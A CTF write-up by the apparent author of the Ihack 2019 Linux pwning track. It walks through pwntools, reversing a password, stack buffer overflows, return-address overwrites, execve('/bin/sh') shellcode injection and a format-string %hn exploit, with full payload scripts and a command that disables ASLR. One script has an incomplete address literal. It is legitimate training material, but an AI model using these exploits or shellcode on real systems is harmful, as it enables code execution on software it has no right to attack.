[Hackfest] pwning challenges Ihack 2019

The Ihack CTF is a hacking competition organized 6 months before the Hackfest. It aims to be accessible to all levels. For more details, see the official website: https://ihack.computer/

For the 2019 edition, I created a track on Linux binary exploitation (pwning). I built the challenges to introduce beginners to this “world”. You can download and install the challenges from this GitHub repository.

I don’t explain some technical concepts in depth, so I advise you to read the relevant sections of the popular hacking book The art of exploitation before beginning a challenge.

1) Introduction to pwntools

To get started in the pwning world, you need the right tools. One of the most popular tools for communicating with a remote program is pwntools. It is written in Python and makes binary exploitation much easier. NB: Don’t try to install pwntools on Windows, you will just waste your time! In any case, most tools used to exploit Linux binaries only run on Linux.

For this challenge, you just need to send back the number provided by the remote program. You need to give 10 correct answers and, of course, you need to do it very quickly.

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *
import re
#remote opens a connection to the program
p = remote('sushi.hfctf.org', 1111)

output = ""
while "FLAG" not in output:
	#recv receives the data sent by the program
	output = p.recv()
	print(output)
	#regex to extract the number
	m = re.search("[0-9]{2}", output)
	if m is not None:
		#we send the answer
		p.sendline(m.group(0))
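
The parsing step can be tried offline, without the remote service. The sketch below isolates the regular expression used in the script above. The prompt strings are made up for illustration, since the real output of the service is not reproduced here.

```python
import re

def extract_number(output):
    """Return the first two consecutive digits found in output, or None."""
    match = re.search(r"[0-9]{2}", output)
    return match.group(0) if match else None

# Hypothetical prompts, only there to exercise the regex.
print(extract_number("Send me back this number: 42"))   # 42
print(extract_number("No digits here"))                  # None
# A three-digit number would be cut to its first two digits.
print(extract_number("Number: 123"))                     # 12
```

If the service ever sent numbers with more or fewer than two digits, a pattern such as `[0-9]+` would be the safer choice.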

2) Reverse Engineering

Before beginning this challenge, it is preferable to learn the basics of assembly language. I advise you to read section 0x250 “Getting Your Hands Dirty” of the book The art of exploitation.

For this challenge, you need a disassembler and a debugger. I will use Ghidra and gdb.

You need to find the correct password in the program. With Ghidra and gdb, it should be easy to find.

With Ghidra, we can see where the password is compared with our input and where it is stored.

To be sure, we can verify this with gdb. First, we need to find in Ghidra the address where the function strcmp is called.

start
b *0x0804876a
c

With the command x/s 0xffffd1c9, we can see that the characters of the string are not printable (of course, the address on the stack can be different for you).

With gdb, we can see the hexadecimal value of the characters with the command x/15x 0xffffd1c9 (remember that a string always ends with a null character).

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = remote('sushi.hfctf.org', 2222)
print(p.recv())
p.sendline("\x99\x83\xc8\x8a\x93\x8f\xea\x87\xbb\xac\xd2\x8e\xdd\x9b")
print(p.recv())
print(p.recv())
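
When gdb displays memory as 32-bit words, the bytes of each word appear in reverse order on a little-endian machine, so they have to be reordered before being sent. The sketch below shows that conversion, assuming gdb printed 4-byte words. The words are rebuilt from the password bytes of the script above, and whatever follows the terminating null byte is an assumption.

```python
import struct

def words_to_bytes(words):
    """Pack 32-bit words as little-endian and cut at the first null byte."""
    raw = b"".join(struct.pack("<I", word) for word in words)
    return raw.split(b"\x00", 1)[0]

# Words rebuilt from the password used in the script above; the zero
# padding in the last word is an assumption.
words = [0x8ac88399, 0x87ea8f93, 0x8ed2acbb, 0x00009bdd]
password = words_to_bytes(words)
print(len(password))   # 14
```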

3) Play with the stack

Before beginning this challenge, it is preferable to learn how memory segmentation and buffer overflows work. I advise you to read section 0x270 “Memory Segmentation” and section 0x320 “Buffer Overflows” of the book The art of exploitation.

You now have the prerequisites to perform your first binary exploitation. Take a look at the program’s behavior.

If you enter a large input, you will see that the variables are overwritten and the program crashes. The input is vulnerable to a buffer overflow attack (“erreur de segmentation” means “segmentation fault” in French).

Each variable is stored on the stack during the execution. The stack looks like this:

With pwntools, it is easy to find the right offset to control the values of the variables.

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = remote('sushi.hfctf.org', 3333)
print(p.recv())
p.sendline(cyclic(200))
print(p.recv())
print(p.recv())

from pwn import *
# v = 0x76 a = 0x61
# remember the stack layout: letter_4 comes before the other letters
print(cyclic_find(0x61616176))
#result 84
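
The pattern produced by cyclic is a de Bruijn sequence: every group of 4 consecutive characters appears only once, so the value found in a variable or a register identifies a single offset. Below is a minimal pure-Python sketch of the idea, not the pwntools implementation. It assumes the lowercase alphabet and 4-byte groups, which to my knowledge are the pwntools defaults.

```python
import string
import struct

def de_bruijn(alphabet, n):
    """Generate a de Bruijn sequence in which every n-gram is unique."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)

PATTERN = de_bruijn(string.ascii_lowercase, 4)

def find_offset(value):
    """Offset in the pattern of a 32-bit value read as little-endian."""
    needle = struct.pack("<I", value).decode("ascii")
    return PATTERN.find(needle)

print(PATTERN[:16])              # aaaabaaacaaadaaa
print(find_offset(0x61616176))   # 84
```

The value 0x61616176 is the string "vaaa" once stored in little-endian order, which is why the search is done on the packed bytes and not on the hexadecimal digits.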

We find the variable declarations. Below, we can see where the vulnerability is located.

scanf("%s", username);

No & is needed before username: scanf expects a pointer as its second parameter and username, being a character array, is already passed as a char *. The real problem is that %s has no field width, so scanf copies as many characters as the user sends, whatever the size of the buffer. This mistake makes the program vulnerable to a buffer overflow.

Further in the code, we can see some conditions where the keyword and the password are verified.

We see that the correct value for the keyword is L33T. Because letter_4 comes first in memory, the letters are sent in reverse order. So, with the following script, we can overwrite the letters with the correct values:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = remote('sushi.hfctf.org', 3333)
print(p.recv())
p.sendline("A"*84+"T33L")
print(p.recv())
print(p.recv())

So the final step is to find the correct value for the password. We can see it in hexadecimal directly in the ASM code:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *

p = remote('sushi.hfctf.org', 3333)
print(p.recv())
# filler, keyword letters, then the password packed as a little-endian 32-bit value
p.sendline("A"*84+"T33L"+p32(0xdadafafa))
print(p.recv())
print(p.recv())
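
To see what this payload does to the variables, it can be rebuilt and read back without pwntools. In the sketch below, p32 is a stand-in written with struct, and the layout (84 filler bytes, then the four letters, then a 4-byte password) is inferred from the offsets used in this write-up, not taken from the source code of the challenge.

```python
import struct

def p32(value):
    """Pack an unsigned 32-bit integer as little-endian, like pwntools p32."""
    return struct.pack("<I", value)

# 84 filler bytes, then the four letters, then the password.
payload = b"A" * 84 + b"T33L" + p32(0xdadafafa)

# Toy view of the overwritten variables (assumed layout, see above).
letters = payload[84:88]
password = struct.unpack("<I", payload[88:92])[0]

print(letters[::-1].decode("ascii"))   # L33T
print(hex(password))                   # 0xdadafafa
```

The password bytes travel as fa fa da da: the least significant byte comes first, which is exactly what p32 takes care of.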

4) Overwrite the ret address

Now, you are able to control the values on the stack. The input of this challenge is vulnerable like the previous one. If you reverse the program, you will see a function secret that prints the flag, but this function is never called in the program.

To jump to this function, you need to redirect the execution of the program. To do this, you need to overwrite the return address. What is the return address? When a program calls a function, it needs to remember where the execution was before the call in order to come back to this point once the function has finished. So, before calling the function, it stores the address of this execution point on the stack. This address is named the “return address”. Each function ends with a ret instruction. When this instruction is executed, the return address is popped and the execution flow is redirected to it.
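
The mechanism can be modelled with a few lines of Python. This is only a toy model of a stack frame, not what the CPU really does. The numbers are the ones that appear later in this challenge (offset 32, 0x08048798, 0x08048688), and treating the 32 bytes before the return address as a single block of locals is an assumption.

```python
import struct

RET_OFFSET = 32            # distance from the input buffer to the return address
LEGIT_RETURN = 0x08048798  # instruction right after the call of the challenge function

def make_frame():
    """Toy stack frame: 32 bytes of locals followed by the return address."""
    return bytearray(b"\x00" * RET_OFFSET + struct.pack("<I", LEGIT_RETURN))

def unchecked_copy(frame, data):
    """Copy data into the frame with no bounds check, like the vulnerable input."""
    frame[0:len(data)] = data
    return frame

def ret(frame):
    """Return the address that a ret instruction would jump to."""
    return struct.unpack("<I", bytes(frame[RET_OFFSET:RET_OFFSET + 4]))[0]

frame = unchecked_copy(make_frame(), b"hello")
print(hex(ret(frame)))     # 0x8048798

frame = unchecked_copy(make_frame(), b"A" * 32 + struct.pack("<I", 0x08048688))
print(hex(ret(frame)))     # 0x8048688
```

A short input leaves the return address untouched, while an input longer than 32 bytes replaces it with bytes chosen by the attacker.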

To analyze this in the challenge, we need the address of the ret instruction. With Ghidra:

If we put a breakpoint on this address, we will see the value of the return address:

We can see that the address 0x08048798 corresponds to the instruction just after the call of the challenge function:

If we enter a lot of A characters, we will see that the return address is overwritten and, consequently, the program crashes:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process('chal4')
# attach gdb to the process
gdb.attach(p)
print(p.recv())
p.sendline(cyclic(200))
# never forget to add p.interactive()
# without it you cannot debug the program:
# because a Python script launches the program,
# chal4 is removed from memory as soon as the script ends
# https://reverseengineering.stackexchange.com/questions/15204/why-cant-gdb-read-memory-if-pwntools-is-used-to-send-input
p.interactive()

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *
print(cyclic_find(0x61616169))
# result 32

With the right offset, we are able to write whatever we want in the return address:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process('chal4')
# attach gdb to the process
gdb.attach(p)
print(p.recv())
p.sendline("A"*32+p32(0x08048688))
p.interactive()

The last step is to get the address of the beginning of the secret function and to overwrite the return address with it to get the flag:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = remote('sushi.hfctf.org','1234')
print(p.recv())
p.sendline("A"*32+p32(0x))
print(p.recv())
print(p.recv())

5) Pop the shell

You now have all the prerequisites to fully exploit a vulnerable program. It is recommended to read section 0x330 “Experimenting with BASH” of the book The art of exploitation. You need to execute a shellcode to pop your shell. You don’t need to understand how to build a shellcode. Briefly, a shellcode is a piece of code that performs some action, and it is often used to execute a shell (/bin/sh). For this challenge, you can use an existing shellcode. Chapter 5 of the book The art of exploitation is a very good introduction to building a shellcode.

This challenge is more complicated to exploit than the others, but all the protections are disabled: no NX and no ASLR. To debug on your laptop, you need to disable ASLR with the following command:

echo 0 > /proc/sys/kernel/randomize_va_space
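
Before debugging, it can be useful to check which value is currently set. The following sketch reads the same file and translates the value. The helper names are mine, and the descriptions summarize the meaning of the three values as documented for the Linux kernel.

```python
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and vDSO randomized",
    2: "same as 1, plus the heap (brk) randomized",
}

def describe_aslr(raw):
    """Translate the content of randomize_va_space into a description."""
    return ASLR_MODES.get(int(raw.strip()), "unknown value")

def current_aslr(path="/proc/sys/kernel/randomize_va_space"):
    """Read the live setting; returns None if the file is not available."""
    try:
        with open(path) as handle:
            return describe_aslr(handle.read())
    except (IOError, OSError):
        return None

print(describe_aslr("0\n"))   # disabled
print(current_aslr())
```

Writing to this file requires root privileges, and the setting goes back to its default after a reboot.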

I give you the address of each variable on the stack and, if you read the output, only the value of food is preserved after the print. We can confirm this with Ghidra:

Now, we need to find the vulnerable variable. If you take a look at the function called for the inputs, you will see that it is gets. gets is an old function with no protection against buffer overflows, which is why its use is discouraged.

So, if we input a lot of A characters into the address variable, the program will crash:

But why are A characters displayed everywhere? Remember how the stack looks in the program:

So when you input a lot of A characters into the address variable, the variables that follow it are overwritten with A.

If you look at the beginning of the program, you will see that the arguments of main and the environment variables have been deleted:

Consequently, it is not possible to place our shellcode in an environment variable and, because name, color and address have been deleted, you need to place the shellcode in food.

Before this, you need to redirect the execution flow to food. As in challenge 4, you need to find the right offset to overwrite the return address.

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process('chal5')
gdb.attach(p)
print(p.recv())
p.sendline("toto")
print(p.recv())
p.sendline("sushi")
print(p.recv())
p.sendline("blue")
print(p.recv())
p.sendline(cyclic(200))
p.interactive()

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *
print(cyclic_find(0x6261616d))
#result: 148

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process('chal5')
gdb.attach(p)
print(p.recv())
p.sendline("toto")
print(p.recv())
p.sendline("sushi")
print(p.recv())
p.sendline("blue")
print(p.recv())
p.sendline(cyclic(148)+p32(0xffffd194))
p.interactive()

We can put a breakpoint on the ret instruction of challenges in order to check that the return address is overwritten with the correct value. With Ghidra, we can see that the address of the ret instruction is 0x080487fe:

With the gdb command ni (for next instruction), we can see that the program is redirected to the right address. Because the food value is overwritten by the buffer overflow, we can’t write our shellcode directly in food. Instead, we need to write the shellcode through the address input at the right offset. We can get the offset through the gdb command x/x 0xffffd194:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *
print(cyclic_find(0x61616170))
#result: 60

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process('chal5')
gdb.attach(p)
print(p.recv())
p.sendline("toto")
print(p.recv())
p.sendline("sushi")
print(p.recv())
p.sendline("blue")
print(p.recv())

#The shellcode comes from http://shell-storm.org/shellcode/files/shellcode-811.php
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
#\x90 is the opcode for the NOP instruction, after the shellcode
# I prefer to
p.sendline("A"*60+shellcode+"A"*(148-60-len(shellcode))+p32(0xffffd194))
p.interactive()
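
The arithmetic of the last sendline is easier to check when the payload is built step by step. The sketch below reproduces the same layout with the standard library only. The function name and its checks are mine, and the offsets 60 and 148 and the address 0xffffd194 are the local values found above.

```python
import struct

SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
             b"\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80")

def build_payload(shellcode, food_addr, food_offset=60, ret_offset=148):
    """Filler up to food, shellcode, filler up to the return address, new address."""
    if len(shellcode) > ret_offset - food_offset:
        raise ValueError("shellcode does not fit before the return address")
    payload = b"A" * food_offset + shellcode
    payload += b"A" * (ret_offset - len(payload))
    payload += struct.pack("<I", food_addr)
    if b"\n" in payload:
        raise ValueError("gets stops at a newline, the payload would be truncated")
    return payload

payload = build_payload(SHELLCODE, 0xffffd194)
print("%d %d" % (len(SHELLCODE), len(payload)))   # 28 152
```

The newline check matters because gets stops reading at the first newline: an address or a shellcode containing the byte 0x0a would be cut before reaching the return address.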

For the remote program, you just need to replace the address of food and it will work!

6) Format string

This last challenge is supposed to be the hardest. I did not have the time to build it the way I wanted. After seeing the number of solves, I think that the difficulty was high enough. Anyway…

To solve this challenge, you need to understand how format strings work. You can read section 0x350 “Format Strings” of the book The art of exploitation.

NB: If the addresses on the stack change, it is because I didn’t write this write-up in one sitting. So don’t be confused about this!

One of the first things you need to do to exploit a binary is to check which protections are enabled with the following command:

You can see that, among the protections, only RELRO is enabled (full). It means that it is not possible to exploit the program through the GOT. Now, it is time to reverse the program. As in the previous challenge, it is not possible to place a shellcode in an environment variable.

The function “printf” is called without a format string parameter, so our input is used as the format string. It is a classic format string vulnerability. We can confirm this by entering a format string at the vulnerable call. The input needs to begin with sushi in order to pass the condition.

We see that the format string “%08x” is interpreted. You can also see that the address of the vulnerable variable is displayed. It will help you a lot when you exploit the program remotely.

We can’t exploit the format string through the GOT, but we can overwrite the return address thanks to the format string parameter %n. Before this, we need enough space to put our shellcode. With Ghidra, we can check whether the variable food is big enough to contain our shellcode:

250 bytes is more than enough for the shellcode. We need to find where the return address is on the stack when the program prints our input. First, we need to place a breakpoint on the ret instruction and look at the value of the return address on the stack. With Ghidra:

Now, with gdb, we place a breakpoint at the address 0x08048695 with the following command:

After running the program, we can see that the value of the return address is 0x80487b7 and that it is located at the address 0xffffd33c on the stack.

The program gives the address of food, so we just need to overwrite the return address to jump into our variable. At the time of writing, the address of food is 0xffffd222. I will use the following shellcode:

\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80

So, we need to write 0xd222+5 = 0xd227 (because of the 5 sushi characters) at the address 0xffffd33c and 0xffff at the address 0xffffd33e.

payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80" + p32(0xffffd33c) + p32(0xffffd33e)

We need to find where \x3c\xd3\xff\xff and \x3e\xd3\xff\xff are located on the stack. To debug the program, I will use the following code:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process("./chal6")
gdb.attach(p)
payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80" + p32(0xffffd33c) + p32(0xffffd33e) + 20*"%x-"
print(p.recv())
p.sendline(payload)
#Never forget this line! without it the program will close and we cannot debug it!
p.interactive()

If you count, the two addresses are located in the 12th and 13th position. We can confirm this with the following payload:

payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80" + p32(0xffffd33c) + p32(0xffffd33e) + "%12$08x%13$08x"

Now, we need to calculate the number of characters to print in order to write d227 at the address 0xffffd33c and ffff at the address 0xffffd33e.

sushi = 5 bytes
shellcode = 25 bytes
first and second addresses = 8 bytes
total = 5 + 25 + 8 = 38
0xd227 equals 53799 in decimal
So the value to print for 0xffffd33c is 53799-38=53761

0xd227 equals 53799 in decimal
0xffff equals 65535 in decimal
So the value to print for 0xffffd33e is 65535-53799=11736 (53799 characters have already been printed)
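
The same calculation can be written as a small function, which avoids mistakes when the addresses change. This is a sketch for this specific case only: it assumes that the low half of the target is written first and that it is smaller than the high half, which holds here because the high half is 0xffff. The function name is mine.

```python
def hn_widths(target, already_printed):
    """Field widths for two %hn writes: low half first, then high half."""
    low = target & 0xffff
    high = (target >> 16) & 0xffff
    first = low - already_printed
    second = high - low
    if first <= 0 or second <= 0:
        raise ValueError("this simple scheme needs printed < low half < high half")
    return first, second

# Target: address of food + 5; 38 bytes are printed before the first %x.
first, second = hn_widths(0xffffd222 + 5, 5 + 25 + 8)
print("%d %d" % (first, second))   # 53761 11736
```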

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = process("./chal6")
gdb.attach(p)
# local address of food: 0xffffd222
payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80" + p32(0xffffd33c) + p32(0xffffd33e) + "%53761x%12$hn%11736x%13$hn"
print(p.recv())
p.sendline(payload)
p.interactive()

On the remote program, because the address of food is given, you can calculate where the return address is. You can get the offset from the local addresses: 0xffffd33c - 0xffffd222 = 0x11a. In my case, the remote address of food is 0xffffdb82, so the return address is located at 0xffffdb82 + 0x11a = 0xffffdc9c.

sushi = 5 bytes
shellcode = 25 bytes
first and second addresses = 8 bytes
total = 5 + 25 + 8 = 38
0xdb82+5 = 0xdb87 (because of the sushi characters, don't forget!) equals 56199 in decimal
So the value to print for 0xffffdc9c is 56199-38=56161

0xdb87 equals 56199 in decimal
0xffff equals 65535 in decimal
So the value to print for 0xffffdc9e is 65535-56199=9336 (56199 characters have already been printed)
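
Since everything depends only on the address of food, the whole payload can be derived from it. The sketch below does so with the standard library. It assumes that the distance 0x11a and the stack positions 12 and 13 measured locally are the same on the remote host, and the function name is mine.

```python
import struct

SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
             b"\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
PREFIX = b"sushi"
RET_DELTA = 0x11a      # 0xffffd33c - 0xffffd222, measured locally
FIRST_INDEX = 12       # stack position of the first address

def build_payload(food_addr):
    """Rebuild the two-write %hn payload from the address of food."""
    ret_slot = food_addr + RET_DELTA
    target = food_addr + len(PREFIX)          # first byte of the shellcode
    head = PREFIX + SHELLCODE + struct.pack("<II", ret_slot, ret_slot + 2)
    low, high = target & 0xffff, target >> 16
    fmt = "%%%dx%%%d$hn%%%dx%%%d$hn" % (
        low - len(head), FIRST_INDEX, high - low, FIRST_INDEX + 1)
    return head + fmt.encode("ascii")

payload = build_payload(0xffffdb82)
print(payload[38:].decode("ascii"))   # %56161x%12$hn%9336x%13$hn
```

Like the manual calculation, this only works while the low half of the target is larger than 38 and smaller than the high half.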

So, finally, we can pop the shell and print the flag with the following code:

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = remote('127.0.0.1','1337')

payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80" + p32(0xffffdc9c) + p32(0xffffdc9e) + "%56161x%12$hn%9336x%13$hn"

print(p.recv())
p.sendline(payload)
p.interactive()

fmtstr_payload

Before the competition, my friend corb3nik tested my challenges and, for the format string, he used the pwntools feature fmtstr_payload.

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

p = remote('127.0.0.1','1337')

payload = "sushi" + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xe2\x53\x89\xE1\xB0\x0B\xCD\x80"
#address of food
addr = 0xffffdb82
target = addr + len(payload)
#we write 0xffffdb87 on 0xffffdc9c (where the ret address is located on the stack)
data = {
   0xffffdc9c : addr + 5
}

fmt = fmtstr_payload(5 + len(payload)//4, data, numbwritten=len(payload))

print(p.recv())
p.sendline(payload+fmt)
p.interactive()
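
The first argument of fmtstr_payload is the stack position where the generated format string starts, and numbwritten is the number of bytes already printed before it. The small sketch below redoes that arithmetic. Reading the constant 5 as the position where the input begins on the stack is my assumption, not something stated by the script.

```python
PREFIX = b"sushi"
SHELLCODE_LEN = 25          # length of the shellcode used above
BUFFER_START_INDEX = 5      # constant taken from the call above (assumed meaning)

prefix_len = len(PREFIX) + SHELLCODE_LEN
# Floor division, which is what / does on integers in Python 2.
offset = BUFFER_START_INDEX + prefix_len // 4

print(offset)        # 12
print(prefix_len)    # 30
```

The result matches the position 12 found by hand. Under Python 3, a plain / would produce 12.5, so the floor division has to be explicit there.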